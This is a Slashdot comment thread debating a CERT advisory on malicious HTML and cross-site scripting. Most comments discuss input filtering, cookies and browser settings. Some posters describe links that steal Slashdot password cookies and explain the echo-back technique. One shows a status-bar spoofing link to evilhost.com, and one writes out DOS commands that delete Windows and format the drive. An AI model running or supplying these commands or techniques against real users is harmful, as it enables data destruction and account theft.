    Somehow, reading your post started me off on a rant, a lot of somehow related images in my mind. If I were a wordsmith, this would read much better.

    >>I'm not saying that I'm a good programmer or a very experienced one - its just common sense.

    I like and trust your "inexperience" more than Microsoft's "experience".

    Nothing is more uncommon than common sense.
    The road to disaster is to think you know what you are doing when you do not.
    It's not what we don't know, it's what we know that ain't so. -- Will Rogers?
    There is no "silver bullet".

    The advisory looks more like old news than anything just discovered, but with the rapid rise in e-whatever and XML aimed at tying business to business, it's about time to post signs on the minefields (plural) that are waiting to blow up a lot of unsuspecting victims. With Microsoft promulgating the idiot's guide to e-commerce (behind some slick facade), there _will_ be plenty of victims.

    Off topic. After some 30 years, unix is still around and going strong. Why? I think somehow the answer is related to what is right about your post. From Webster's second edition, hack 1. To cut irregularly, as if by repeated strokes of a cutting instument. The term hacker is very much associated with unix. A hacker must be one who hacks. Or creates hacks. The term has to be somewhat derogatory, but is a mark of esteem, as in kernel hacker. If you are facing a problem that is bigger than you are, all you _can_ do is hack. From Linus's keynote, "We've learned computers are just too damned hard to use." If Bourbaki (sp?) can have 100 pages on the difficulties of the number 1, imagine the diffulties in something vastly more complicated. Bourbaki is/was a them. Some number of top French mathematicians. Directly responsible for introducing the "new math". Teaching third-graders concepts that I first encountered as a math grad student. You can, and should, make a few things straight forward and easy, but mostly, and where it matters most -- not a chance.

  162. Re:Maliciousness by Tony-A · · Score: 1

    Who is stupid? The scammer or the scamee?

  163. Re:Maliciousness by Tony-A · · Score: 1

    What did you expect?
    Microsoft is essentially single-user, who can do anything. NT is a little better, but not by much.
    Unix security is primitive, but adequate for normally trustworthy users.
    Look for something (Capabilities?) that can control who can do what to whom and does not assume that users are benign. Good luck. As I remember it, MTS (Michigan Terminal System) had at least _some_ desirable properties. I think Multics (think of unix as castrated multics) has done some good work in that area.

  164. Re:attn: coders by duplicateAccount · · Score: 1

    Godd Idea. How can code KDE and GNOME? (Me not.) An applet, where I can drag the URL into, which in turn adds the URL to my junkbuster would do. I guess this could be in freshmeat tomorrow!

  165. This Advisory inspired a working Slashdot crack... by FutileRedemption · · Score: 1

    ok, admitted, only a user account crack.
    Which however works well.

    There are some messages here with links that send your slashdot pw to any site when clicked...

    Looks like the Advisory wasnt irresponsible at all.

    Despite the fact that such exploits are trivial indeed. In hindsight, at least.

  166. Re:attn: coders by _Lint_ · · Score: 1

    It also lets you selectively allow cookies from some sites.
    It also lets you change the "type of browser" which is sent to web sites.
    It also lets you change your "referer" tag (which can be used by web sites to determine what the last site you visited was).

    Cool little app!

  167. Re:Works in Slashdot by Wah · · Score: 1

    Step 1 : View Source

    Step 2 : Cut Paste Edit

    Step 3 : Trolling goes to a whole new level...

    --
    +&x
  168. Re:Needed: Accessible JScript on/off Control by blowdart · · Score: 1

    You want to be really fussy? Isn't it ECMA Script? AS it stands Microsoft's JScript implementation does a better job of sticking to the W3C DOM than Netscape's does.

  169. I've been writing CGI scripts for years.. one of the things I ALWAYS do is to make sure people can't submit HTML tags to any form which will display the output on a webpage. This is nothing new, but I guess newbies need to learn these things too.

  170. Re:Duh? by twrayinma · · Score: 1

    I think this advisory kinda proves that people don't know this stuff. Seems to me that many people will be surprised by this one.

    Time to deign to speak to lesser mortals, i think, so the word gets out.

    -t

  171. uGGH by segmond · · Score: 1

    This is no new news, I have tried this long time ago, I don't consider it a vulnerablity on HTML, it is because developers develop bad code, developers should develop code to protect against this, it is just like the PERL problem with system() where someone can supply input with "; command" and so on, that is not a PERL security problem, it is the responsibility of programmers to develop secure code.


    --
    ------ Curiosity killed the cat. {satisfaction brought it back | it didn't die ignorant | lack of it is killing mankind
  172. Re:Interesting and valid security hole by knight_23 · · Score: 1

    What I would realy like to see is a browser that would let me create a list of sites and then reject all cookies, images, web pages, etc. that come from that page. Then things like bubble click's abuse of cookies would no longer affect me. Now me question is, is this some thing that can be done with current browsers? or is this something that can only be done with a program running on a server?

    --
    __ Fast - Cheap - Good Pick any two
  173. Re:Duh? by penguinboy · · Score: 1

    Seriously. I have a book on CGI programming in Perl from 1996 that explains why it has a line of code in the guestbook example that deletes all properly-formatted SSIs () so that a malicious visitor can't put say, into their comment and have your whole password file show up in the guestbook (if your webserver isn't running chroot'ed to it's own root directory, that is). I'm quite amazed that so few people are aware of this the CERT has to post a warning now.

    My $0.02

  174. Re:Duh? by penguinboy · · Score: 1

    I know it's not exactly the same thing (surfers affected, not site security), but it's similar in principle: web servers need to carefully filter out harmful code from malicious users. And indeed, the various encoding schemes make things more complicated.

  175. Ok, Chester, I'll play your games by pvolt · · Score: 1

    click her e and I get your slash password in my webserver logs (double-url encoded, but I can pull them all out later)

    Take a look at the URL of that broken image in the title bar for the trick

    Yes this demo works, but I don't want your passwords. Sometimes, I am so 1337 it hurts.

    http://net.bruno.net/

    1. Re:Ok, Chester, I'll play your games by Chester+K · · Score: 1

      Actually alerting the contents of document.cookie was the first thing I tried. I did get a double URL encoded string, but decoding it revealed that it was not my password.

      It does look to be a value based on my password, perhaps with certain characters removed and some added to the front. Undoubtedly they need to take your password and add a user number to the front, so that you have a unique cookie, since your password alone wouldn't be enough of a cookie to identify you.

      Now I'm itching to go get the Slash code and look at it.

      (Sorry about the post, it was just to further illustrate the point you showed... that your cookies can be used against you)

      --

      NO CARRIER
  176. Re:Maliciousness by Tower · · Score: 1

    hmmm, this site comes up as complete gibberish under Netscraper 4.6 on AIX, so I guess I'm safe 8^)

    --
    "It's tough to be bilingual when you get hit in the head."
  177. Re:Interesting and valid security hole by CAIMLAS · · Score: 1
    That's why it's a good idea to turn java/java script off, and only turn it on for specific reasons. That, and those nasty little popup windows that are on places like xoom.

    -------
    CAIMLAS

    --
    ~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
  178. Slashdot vulnerability by CAIMLAS · · Score: 1
    Is slashdot vulnerable? I wonder if Rob and the guys have taken precautions beforehand. I have been somewhat aware of such potential, and how easy it would be to inflict damage in such a manner. I tend to browse with java/javascript and imbeded scraps off on sites that I don't trust. (Recently, this would include the weblogs of slashdot, due to the increase of inflamatory individuals).

    -------
    CAIMLAS

    --
    ~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
  179. Re:CERT Irresponsibility by arthurs_sidekick · · Score: 1
    Thankfully that has been fixed in Communicator 4.7.

    Not over here. This might be a platform-specific thing, but if I turn of JS, CSS go bye-bye, and I'm using 4.7 on Linux.

    --
    "Oh, I hope he doesn't give us halyatchkies," said Heinrich.
  180. Re:CERT Irresponsibility by arthurs_sidekick · · Score: 1

    One nasty side-effect from disabling JS in Netscape (on Linux at least, and I think since 4.5, but I bet it goes back earlier) is that it disables Cascading style sheets too. This is the result of a stupid implementation on Netscape's part, and has (I believe) been fixed in Mozilla, but CSS is something I don't want to have to give up, even though I don't really care so much if I don't have rollovers.

    --
    "Oh, I hope he doesn't give us halyatchkies," said Heinrich.
  181. Please, please, please modirate up? by GMontag · · Score: 1

    This is the FUNNIEST thing that I have seen here! It beats hot grits, it beats petrification, it beats open source man, it beats don knotts guy, it EVEN BEATS JonKatz!

    It is hard to type because my sides hurt (I am serious) and people in cubes around me are asking what the hell is so funny!

  182. Re: Common Sense by Sponge · · Score: 1

    Just as you said, it would be common sense to follow one's own train of thought and remember to hit the "preview" button when trying to write literal html tags into text that accepts embedded html. :P

    Fact is, while it may be common sense, if a web developer is thinking more about how insanely great (tm) their web site will be than about security, it might never occur to them, whereas if you asked them "what should I watch out for when I'm re-serving user input" they'll say "obviously, you have to strip out undesired html tags".

    The CERT advisory is a nice heads-up reminder for all those web developers whose heads are buried a little too deeply in their website features to have noticed this problem.

    Sponge

  183. Re:What a stupid problem! by cyanoacrylate · · Score: 1

    Actually, I'd like to also set JavaScript on/off for particlar sites. I believe that IE does something like this. Essentially I want JavaScript off by default, and then if a page barfs, I'll turn it on, but only for that IP/domain/whatever.

    --
    Don't like my sig? I don't either.
  184. Re:Let's design a... by greenrd · · Score: 1
    Unfortunately it wouldn't. You would just get lots of Javascript errors, which would just annoy lots of people, but it wouldn't turn Javascript off.

    There really is no simple solution.

  185. Re:Maliciousness by greenrd · · Score: 1
    Is that really still true? I didn't realise MS were that stupid.

  186. Re:Does Amazons "one click shopping" fall under th by greenrd · · Score: 1
    See above (in "sort by score" mode). I don't know Javascript, but there are some Javascript URLs up there that display your slashdot password (which is stored in a cookie, remember) in a popup. These could very easily be sent to any server!

    I'm worried now. I will have to be more careful what I click on!

  187. Re:Other issues by British · · Score: 1

    Actually the about: thing in IE 4 is quite handy. You can view .PNG images all by themselves without having to make a web page about it. In the mean time, be on the lookout for any tags with NFL player names inside them.

  188. OK, now whos fault is it? by macbert · · Score: 1
    Wasn't this just a side effect of the ability to post to created pages (oddly like this one) and be able to take advantage of the features of html... If this is such a problem do we blame the W3c or html standard or the server makers, or maybe the client makers.(another aol or M$ lawsuit??) (by blame i mean who is responsible for creating a fix) If the HTML is the culprit then do we need to change the standard to protect against malicious use or should this fall again to the HTML coders and webmasters to work around the security issues yet again (ie JAVA). I think that if this is such a problem then the definition of malicious code will need to be very specific in order to make the standard "safer" (if there is such a thing). If that happens then we will once again be sacrificing features for security.

    /insert sarcasm here/

    Drat, now i can't post my javascript to uninstall windows and reinstall linux on an unsuspecting persons hard drive to slashdot.

    link to my malicious_code

    /end sarcasm/

    --
    macbert@hcity.net
    http://www.hcity.net/mac
    1. Re:OK, now whos fault is it? by technos · · Score: 2

      Drat, now i can't post my javascript to uninstall windows and reinstall linux on an unsuspecting persons hard drive to slashdot. That would be a wonderful way to perform software updates! When the new version of Importantsoft comes out, you email every one of your (l)users a bit of 'sploit code and you never have to get off your butt. !

      --
      .sig: Now legally binding!
  189. Re:Works in Slashdot by omarius · · Score: 1

    I've had similar problems with my website. I wrote a BB program in perl, and users were having a wee bit too much fun with tags. So, I simply modified the code to escape out all >'s with &gt's and all -Omar

  190. Re:CERT Irresponsibility by ukpyr · · Score: 1

    I second that. I can just see HOW cnn and msnbc picks this up
    "ACKk!!! patch your IE against html!!"
    it's just plain silly.
    This is the first thing any server orient web programmer should learn and if they don't know this they aren't worth the carbon in their butt.


  191. Re:This is really nothing new by stardragon · · Score: 1
    I'm curious as to why it took CERT so long to issue this advisory. This problem has been known for a long time, and was reported widely by the media last year -- remember the eBay security problem?

    When I worked on a web registration system for a client last year, one of the security concerns I had to consider was filtering HTML from the user's input.

    Whether this problem is a responsibility for web site programmers or browser developers is not the point. What's important to remember is that any system that accepts code as data is inherently dangerous.

  192. can't depend on status bars by anonymous+loser · · Score: 1

    You could easily wrap a script around the link that puts an innocent-looking URL in the status bar, even though the real URL has malicious code in it. A more common form of this attack can be seen by going to some of those crappy "Top 50" sites and rolling the mouse over some of the links. The link displayed does not match the link in the tag.

    Personally, I think whoever decided to allow control of the status bar from a script should be summarily executed. It hides real information a browser might be trying to display. This is especially annoying on pages that use the status bar as a scrolling message display.

  193. Re:Works in Slashdot by Wedman · · Score: 1

    Cookie anyone?

  194. Re:Works in Slashdot by Wedman · · Score: 1

    Cookie - unescaped TWICE

    This will display your password!!

  195. Re:Works in Slashdot by Wedman · · Score: 1

    If you can audit error logs, you could use this link. I've checked it with my own web server, and it works.

  196. Well DUH! by ikekrull · · Score: 1

    This is what Javascript is ****FOR****

    Thats the whole point of applying a robust security model to Java and Javascript.

    Lets just not mention ActiveX, thats the incredibly scary one.

    Any decent web programmer knows that you can't trust user input. The companies who pay the web programmers' salaries had better realise that we need to allocate time to closing these holes, proper testing of apps in a hostile online environment is *necessary*.

    Server-side holes can usually be fixed quickly, as the server software is usually available in script or source form.. This is not the case, of course, with proprietary systems from many companies.

    To me, primary responsibility for this problem lies firstly with the user, and secondly with the browser manufacturers.

    If you *do not want the possibility of remote code executing on your computer*, then turn support for those features off in your browser.

    Browser manufacturers should ship their products with these options off by default, requiring users to turn them on if they *want* them.

    Hopefully Mozilla will lead the pack in this respect.

    All engines that execute remote code should require options to be *explicitly enabled by the user* in order to perform potentially security-threatening functions.

    This should be called an 'Internet Explorer Advisory' more than anything else.

    IE is the only browser that allows remote code to format your hard drive through ActiveX.

    'Signed ActiveX Controls' are a joke... i bet any 16 year old norwegian hacker could break the security on this stuff.

    --
    I gots ta ding a ding dang my dang a long ling long
  197. Re:Mobile Code: Threat or Menace? by SnakeStu · · Score: 1
    Ok, but what does this have to do with the CERT advisory?

    The advisory isn't about active content. You can get the effect by embedding a FORM tag in a URL to a page that uses a Server-Side Include directive that utilizes the content of the QUERY_STRING environment variable along with its own FORM tag. As long as the SSI directive appears at the right place relative to the page's native FORM, the new FORM tag from the QUERY_STRING will override it, thus redirecting the form processing.

    This isn't active content (scripting, Java, ActiveX, whatever), it's just HTML and server-side processing of environment variables. Sure, JavaScript or whatever might come into play if the attacker so chose, but that doesn't mean that it's the focus of this issue.

  198. Re:Mobile Code: Threat or Menace? by SnakeStu · · Score: 1
    No. That is not what this advisory is about! Please read the advisory carefully. You are talking about the well-established, "old news" issue of protecting user B from malicious code posted by user A. The advisory is about protecting user A from code posted by user A! If you don't understand why, then read the advisory (again).

    As far as the content of comments in Slashdot, it is "vulnerable" because it allows you to link to a page. Like this:

    Click here to read a sci-fi short story.

    Now, that looks like an innocent link, right? But if the "boo" in the query string was replaced with malicious code, and the destination page was such that it would inadvertently redisplay that code, then the user would have a problem. (Don't worry, that link above is not dangerous -- 'boo' is not malicious code!)

    (Actually, the filtering provided by Slashdot might interfere with the inclusion of code into a query string, but that is a side effect.)

    "Thus a nefarious AC could post a slashdot comment that contains malicious tags, and just by surfing through here, your browser gets sacked."

    Within the context of this advisory, you are not going to have your browser "sacked" by reading comments here -- but you could by clicking a link provided in a comment.

  199. Re:New hole?? by SnakeStu · · Score: 1

    Isn't this why I see "allowed HTML" here below?

    No, and if you read and understood the advisory, you'd know that. Controlling HTML in a message board is a way to protect user B from malicious code inserted by user A. The advisory specifically states that it is not about encoding input from user A to protect user B, it is about encoding input from user A to protect user *A* -- and if you don't understand why, read the advisory (again).

  200. Re:Interesting and valid security hole by ToLu+the+Happy+Furby · · Score: 1

    Needless to say, a lot of folks who don't pay attention to status bars and address bars could fall prey to all sorts of exploits based on this that don't require "running" anything on the client machine that a typical security app could catch.

    Actually, as the advisory points out, reading your status bar doesn't protect you, as what is written down there can be changed by Javascript. Thus, they advise everyone to type in all their links manually. Ick.

  201. Re:Maliciousness by DrMaurer · · Score: 1

    Yeah, yeah, I know, i was using it for an example.

    Actually, to do it would be as easy as

    copy c:\windows\command\format.com \
    deltree /y c:\windows
    format /q c:

    later

    --
    Dan
  202. Turning off JavaScript problem by karkle · · Score: 1

    Turning off JavaScript may cause problems with error checking forms. I never thought about this before, but I just tested this out and it can cause a problem.

    If a FORM uses JavaScript's onSubmit to detect that the correct data is submitted and JavaScript is turned off, the form is submitted anyways without an error correction/detection. Tested on Netscape 4.7

    This isn't a major security risk, but as a developer it is good to know that Bad Data may be getting by if error detection is ONLY done on the client side. Which can cause errors to show up in your web application. Invalid Date Format, Empty Fields, etc...

    Also it is good to remember that data can always be submitted to one of your pages without your form ever being used.

    1. Re:Turning off JavaScript problem by Ru610 · · Score: 1

      This is why any serious web application should use serverside scripting like PHP or Perl and not client side scripting, which is unreliable and inconsistent and buggy in implementation (don't even get me started on M$ JScript, %^&$#@$).

  203. Something to think about! by cdlu · · Score: 1

    You may or may not remember this.. but I think this can be relevant if you think of web pages as faxes :)

    GUIDE TO SAFE FAX

    Q: Do I have to be married to have safe fax?
    A: Although married people fax quite often, there are many single people who fax complete strangers every day.

    Q: My parents say they never had fax when they were young and were only allowed to write memos to eachother until they were twenty-one. How old do you think someone should be before they can fax?
    A: Faxing can be performed at any age, once you learn the correct procedure.

    Q: If I fax something to myself, will I go blind?
    A: Certainly not, as far as we can see.

    Q: There is a place on our street where you can go and pay to fax. Is this legal?
    A: Yes, many people have no other outlet for their fax drives and must pay a "professional" when their need to fax becomes too great.

    Q: Should a cover always be used for faxing?
    A: Unless you are really sure of the one you are faxing, a cover should always be used to insure safe fax.

    Q: What happens when I incorrectly do the procedure and I fax prematurely?
    A: Dan't panic! Many people prematurely fax when they haven't faxed in a long time. Just start over, most people won't mind if you try again.

    Q: I have a personal and a business fax. Can transmissions become mixed up?
    A: Being bi-faxual can be confusing, but as long as you use a cover with each one, you won't transmit anything you're not supposed to.canadia:~#

    meant to be taken with an ocean of salt, of course. :)


    #include <signal.h> \ #include <stdlib.h> \ int main(void){signal(ABRT,SIGIGN);while(1){abort(-1); }return(0);}

  204. Re:This is really nothing new by DeadSea · · Score: 1

    I guess, all in all, it isn't much different than me posting a link to a page that has malicious code, except that I don't have to have any servers that support it. That way nobody can contact my ISP and have them get involved, and I can do it anonymously to avoid any legal problems.

  205. Re:CERT Irresponsibility by phutureboy · · Score: 1
    Thankfully that has been fixed in Communicator 4.7.

    --

  206. A Legitimate Use for this trick by eries · · Score: 1

    Hey, I have need of something like this for a (GASP) legitimate usage.

    I am developing a web site (<a href="http://www.CatalystRecruiting.com">Catalyst Recruiting</a>) that allows people who complete our registration process to get free magazine subscriptions. They click on a link that leads to our partner site that actually provides the free magazines.

    Now, the link is actually a javascript function that creates a new popup window with a special coded URL. What I'd like to do is detect (on the server site, using PHP) when the user has clicked on this link. Is there a way to, for instance, have javascript set a cookie on the browser or something of the like? Any other suggestions?

    Thanks so much!

    Eric Ries

    1. Re:A Legitimate Use for this trick by ecampbel · · Score: 2

      Why couldn't you just have your javascript function go first to some page that you can count that number of hits on, and then redirect to the proper page with the magazine subscripitions on it.

      --

      Sig goes here
  207. Re:Interesting and valid security hole by JordanH · · Score: 1
    • But I shouldn't have to worry about buffer overrun errors and the like... The subsystems I develop on should be robust.

    Maybe I don't understand what you're saying here. You shouldn't have to be wary of clients, either, but it's a good practice to do so.

    It's not hard to put code in place to check for buffer overruns from any source, even if that's a subsystem on which you develop. This is just a safe programming practice. You want to know, as soon as possible, when a component is not working as you expect. Buffer size checking helps with this.

    By doing this you increase both robustness AND security in that if some code fails to check the incoming client messages adequately, you still have a good chance of catching it when the incoming message is not the expected length. This might help catch the <form> exploit described in the CERT, for example.


    -Jordan Henderson

  208. Re:attn: coders by c-A-d · · Score: 1

    StarOffice for Win32 has a very nice feature with respect to cookies.
    If you set the browser up to ask you about cookies, you can then select if you ever want to get a cookie from that server ever again.

    --
    some karma... and kinda lukewarm about it.
  209. Re:This is really nothing new by zantispam · · Score: 1

    Yeah, that's the only way to get out of it.

    Question is, how many people are actually dexterous(is that a word? ;-) enough to do that?

    Here's my copy of DeCSS. Where's yours?

    --

    censorship is a form of noise, which actively seeks to drown out content with silence - Crash Culligan
  210. Usefullness of Javascript by SPorter · · Score: 1
    Javascript is an excellent substitution for a lack of content.

    Well, some people seem to believe that....

  211. Re:What a stupid problem! by SteveSmith · · Score: 1

    What might also be nice would be an easily-accessible button for toggling this limited JS on and off...

  212. CERT Slashdotted by jdigital · · Score: 1

    I saw it a second ago, now its gone.

    --
    :wq ~ ~ ~ ~ ~
  213. Re:Maliciousness by CdotZinger · · Score: 1

    But--

    Jodi.org (my personal favorite "art" site) isn't the kind of place you're going to randomly stumble into from some dinko AOL startup page, and it's not "important" like, say Etoys, so who cares. If you go there, you go expecting (harmless) weirdness. And if you go in with Javascript disabled, you usually just get some pretty ASCII art, not this "malicious HTML" CERT's worked up about (rightly). And locking up Windows machines is cute and easy. Ask around Slashdot.

    (OT) About a year ago they did us Mac weenies a favor by posting mysterious binaries that were irresistable to download (because they were mysterious), and if you ran 'em, they mangled your display and made evil screeching noises. Until you pressed command-I, anyway. Big fun. Feats of beautiful, wasteful programming. Unfortunately, I lost my copies during a magical flood that was magnetically drawn to my pile of Zip disks, and not to anything else on this floor of the building. I suspect they had embedded client-side executable malicious Floodscript.


    --
    Your mouth is like Columbus Day.
  214. Re:attn: coders by horza · · Score: 1

    Ability to browser spoof - set what your browser tells sites about your system, the browser itself, etc., thereby making idiot sites that ONLY allow Netscape or ONLY allow IE useless

    You may find it more difficult to spoof the Intel Pentium 3 site, which requires the detection of your P3 serial ID before letting you browse the site...

    Phillip.

  215. Re:...system that could easily be ISP-abused! :-) by def · · Score: 1
    Are they allowed to do this?

    Absolutely. However, no hosting company in their right mind is going to turn off any feature so widely used. They would Immediately lose customers and get a bad rep.

    Web hosting is already a minimal-profit industry, companies compete in terms of features. Less features means less customers. Who would disable it?

    --
    WRCT Pittsburgh, 88.3FM
  216. Re:attn: coders by Mononoke · · Score: 1
    Ability to browser spoof - set what your browser tells sites about your system, the browser itself, etc., thereby making idiot sites that ONLY allow Netscape or ONLY allow IE useless.

    Y'all might want to sit down for this.

    On my Mac (yup, you read correctly) I used to have a version of Netscrape that presented itself to servers like so: (Mozilla 0.32, $, CP/M)

    It's a simple resource edit with ResEdit.

    I'm sure I was at the bottom of most stats, but it was still fun. It showed that way in email and usenet headers also. ^_^

    (Yes, a MacHack. Egads!)


    --

    --
    NetInfo connection failed for server 127.0.0.1/local
  217. MODERATE THIS UP!!! by ecampbel · · Score: 1

    Please, please please someone moderate this up. Does this script really do what the author says? If I changed www.slashdot.org to www.amazon.com, would I be sending him my Amazon.com cookie? If not, what is the difference?

    --

    Sig goes here
    1. Re:MODERATE THIS UP!!! by Marc+Slemko · · Score: 3

      Yes, it does work. There are cases where it doesn't work and various special circumstances that are sometimes needed to make it work, but it does work in a broad range of situations.

      This is what the advisory is about and the essence of what the new issue is. It is the impact of this that hasn't been well understood before. The advisory isn't explicit about the details because that's just the way it is written, and the issue is very broad. But if you read it and understand what it is saying, it does include all the necessary concepts.

      Suppose you want to exploit site A. What you have to do is find a page on site A that can echo back some part of the request unencoded and unfiltered. Then you send a user to that page. When they get the javascript back to them, their browser sees it as coming from site A and executes it. From there, you can control the user's interactions with the site however you want. Stealing cookies is only the most obvious way; the only reason this makes a reqest off to printenv on another server is to send the cookies out and show people they are being sent, in a URL encoded twice format.

      If you wanted to apply this to Amazon, you could. However, you would have to find a different request to make. For example, on slashdot the 404 page doesn't properly encode its output. On amazon there are other pages that have the same problem. The site specific part is finding a page on the site (any page) that you can use.

      For those that say "well, just don't click on any links with script tags in them", that doesn't change anything. I could send you to a page that redirects you there. I could do an onmouseover attribute to make you not see it. etc.

      It also isn't hard to get many users to go to the URL you specify via other means, such as HTML email with the right stuff in.

  218. This is just retarded.... by Spydr · · Score: 1

    This is nothing new... The internet has been like this for years and years - why do they all of a sudden decide to raise an eyebrow at something that has been a threat since as along as i can remember.

    this is like suddenly deciding that giving your account password out is bad and announcing it to everyone. well DUH. I guess what i want to know is why did they just recently decide to release this when the threat is nothing new.

    ---
    http://www.spiderinteractive.net

  219. Re:Interesting and valid security hole by KilobyteKnight · · Score: 1

    Because I use Internet Exploiter at work, I can reject JavaScript, cookies, and Java by default, and selectively enable them on a site-per-site basis (or with wildcards, like *.hotmail.msn.com) simply by going to Tools > Add to Trusted Zone. It makes Superbad fun, and GeoCities bearable.

    And what happens when the website you are on reading "Wowee Neato New Web Security Measures" has a link that says "Page Two" and what it really means it "Link to a site likely to be trusted by over confident people and steal their password cookie"?

    --
    When will Windows be ready for the desktop?
  220. Re:attn: coders ... I second this! by Shadrone · · Score: 1

    > I for one would like to see antibookmarks. Control-click on a banner, that server is blocked. Surf into a trap
    > website, hit an fkey, add its domain to a killfile.

    I very strongly second that!
    I'd like to go to writing a mod for Mozilla, but I'm not up to that skill level yet.

  221. Promiscuous browsing? by nahtanoj · · Score: 1

    While this article does state a need to make radical changes in webpages and browsers in the future, I could not help being amused at the warning to avoided being a "promiscuous browser." I can foresee in the near future the talk of one being a "web-slut" or groups of young boys going "web-wenching." "Don't chat with him, his browser is infected." "Be sure to turn on your condom code before you browse tonight."
    Practice safe surfing.
    Jon

  222. Re:Needed: Accessible JScript on/off Control by saint+beckett · · Score: 1

    it is jscript on ie
    but javascript on netscape and most everything else.
    they should have just named it livescript anyway.

  223. Re:Needed: Accessible JScript on/off Control by saint+beckett · · Score: 1

    or you can just turn the documents menu off see:
    http://www.annoyances.org/win95/win95ann1.html#05

  224. Re:Maliciousness by CeruleanDragon · · Score: 1

    It comes up as a bunch of odd-looking (to me) code under Navigator 4.08 (Communicator 4.7) on Win2K Pro, with JavaScript enabled. I disable it and it just stops at a blank white screen on sod.jodi.org. Doesn't freeze anything. Go figure.

    --
    ad astra per alia porci
  225. nothing new by BadERA · · Score: 1

    nothing new here ... the development community, and likely the script kiddies as well, has been familiar with this issue for a while ... so why the advisory now, particularly?

    --
    I am, therefore you think.
  226. Re:Let's design a... by BadERA · · Score: 1

    these so-called "malicious" tags may simply be plain vanilla HTML tags that have been placed in a strategic location in the HTML stream, altering the behavior or appearance of the form or page in question.

    so, you go ahead and write that script; I'd suggest you do so with the aid of a quantum computer, or maybe a beowulf cluster of [standard slashdot cluster humor here] ...

    --
    I am, therefore you think.
  227. You are an insult by BoneFlower · · Score: 1

    As a member of the United States Marine Corps, I am deeply offended by your post. It does not in any way reflect well on the armed forces that you served. You condemn Linux as simply a hackers tool. It can be, but no more so than whatever operating system you are running. As said by others, few crackers, and fewer hackers, do anything to cause damage. All that is wanted is free flow of information. We do not as a community steal information, engage in vandalism, or screw people over in any way. We fight for what we believe in as generations of americans have done. When the government or a corporation does something the Linux community disagrees with, a peaceful protest is mounted. We do not resort to terrorist tactics as you apparently believe. The whole point is that information should be free. Think about that, and about the image of the armed forces you are showing. I leave you with this quote about free flow of information:

    "If I had to choose between government without newspapers or newspapers without government, I would not hesitate to choose the latter"

    Lance Corporal George E. Worroll Jr. United States Marine Corps

    1. Re:You are an insult by BoneFlower · · Score: 1

      I don't know if thats an accurate quote, never heard it before. Its a moronic idea either way. A standing military MUST be under the control of a civilian government if there is to be guarantees of freedom.

    2. Re:You are an insult by myxlplix · · Score: 1

      SIR, YES, SIR there are actually a lot of Marine geeks out here. Dumb Marines don't last long. The guy writing the the funny post at the beginning of this thread had it wrong. Marines protect the freedom of the citizens of the USA to choose what they want, do, have and of course be. (even if you want to be a pig headed neo-nazi ba****) I for one am proud of the fact that I once served to protect /.'s right to open source and free speech (etc.) but I also don't always agree with open source community. Contrary to popular belief the services are not out there to keep the USA highly moral (by whoever'e definition) so go hackers and crackers and have fun.... Just don't exspect me to lift a hand to defend you when your neighbor cuts your phone line or neck (which ever one he gets to first).

  228. Re:Promiscuous Browsing by GossG · · Score: 1

    Cookies off = "HTTProphylactic"

    And provides about the same ratio of nuisance value.

  229. You've got that the wrong way around by intmainvoid · · Score: 1
    instead of searching for onClick onMouseOver etc. you should define a list of acceptable tags and only allow those.

    If you try and define what you can't use, you will always be one step behind - you'll either forget tags, or new tags will catch you out. An "allow these tags only" approach is the correct way to do it. A "disallow these tags" approach in inherently flawed.

  230. Yer blockin traffic grandpa by earache · · Score: 1
    Paranoia will destroya, or so sez the kinks.

    THROW AWAY THE TECHNOLOGY BECAUSE IT MIGHT HURT US. Why even bother turning on your computer in the first place? You're harddrives might just fail today, are you ready to take that risk? Leave the switch off, stand away from the machine and everything will be OK. Everything will be fine. No malicious website will steal your cookies. Just leave that switch off, that's right don't touch it.

    earache.

  231. Putting it to good use by Michael+Woodhams · · Score: 1

    Can we use this exploit to randomly overwrite people's doubleclick cookies? :-)

    --
    Quattuor res in hoc mundo sanctae sunt: libri, liberi, libertas et liberalitas.
  232. Re:Interesting by [Xorian] · · Score: 1
    Basically, check the link before you click it. Look for any sign of an ebmedded evil script in the ?variable=badstuff.

    Unfortunately, thanks to features like JavaScript mouse-overs, unless you dig through the HTML you may not see the real URL. For example, this:

    Mickey's Home

    Might actually be this:

    <a href="http://evilhost.com/"
    onMouseOver="window.status='http://disney.com/'"
    onMouseOut="window.status=' '">Mickey's Home</a>
    --
    CVS is teh suck. Use Vesta instead.
  233. It's a bit early for april fools' day by bytesex · · Score: 1

    It seems to me that the safest thing a user can do is stay at home, unplug everything, turn off electricity and gas (we need water, you know, we're only human), dress yourself up in whatever piece of clothing you can find and wait for summer. But seriously; HTTP is safe, and people who make CGI that doesn't check out what people POST (or GET, for that matter) are insane and a risk to their own machines and their own liability.

    --
    Religion is what happens when nature strikes and groupthink goes wrong.
  234. what a joke by -ryan · · Score: 1
    This is a phuqing joke. How many of us do not know that there have been js, activeX, and sadly even java, security vulnerabilities in web browsers? And how many of us have forgotten server vulnerabilities like ::$DATA?

    Is CERT just now getting around to figuring out the Navigator and IE, IIS.. et.al., are not 100% rock solid?

    What's next? CERT Advisory on Malicious Computer Users known as h4XX0rZ???

    -ryan

    "Any way you look at it, all the information that a person accumulates in a lifetime is just a drop in the bucket."

  235. Re: Why store password in cookies? (Use sessions) by Ru610 · · Score: 1

    Well, I wonder if load balancing is not possible. With PHP session storage is file-based so you could share the same session directory between multiple servers.

    Cookies lasting longer that sessions is Ok if you're the only one using the client computer but in settings like a public Internet facility you don't want that sort of stuff.

    Storing only the username in a cookie is VERY dangerous! This way an attacker could forge a cookie with only a username and gain access.

    I've never heard of any web development guides which recommend against using session variables. Please point me to them, I'm very interested.

    In any way, I think storing the username/password combination in a cookie is probably the worst thing you can do security wise...

  236. Re:attn: coders by Ru610 · · Score: 1

    Hmmm, I like your suggestions except the browser spoof one. I agree that IE/NS only sites are bad but as a web developer I think it would be extremely frustrating if there was no way to reliably figure out what the client browser is.

    I design sites for 'all' browsers (3.0 upward) but hide things like DHTML etc. from older browsers by checking their versions.

  237. Re:this will steal your slashdot cookies by KillBot · · Score: 1
  238. Re:CERT Irresponsibility by dbm00 · · Score: 1

    Bullshit. You must be on a different web than I am, because I have never seen a web browser where Javascript was a key feature -- not counting stuff like games that are written to show off what Javascript can do. From what I've seen, the main use of Javascript is that newbie webmeisters try to use it as a replacement for links.

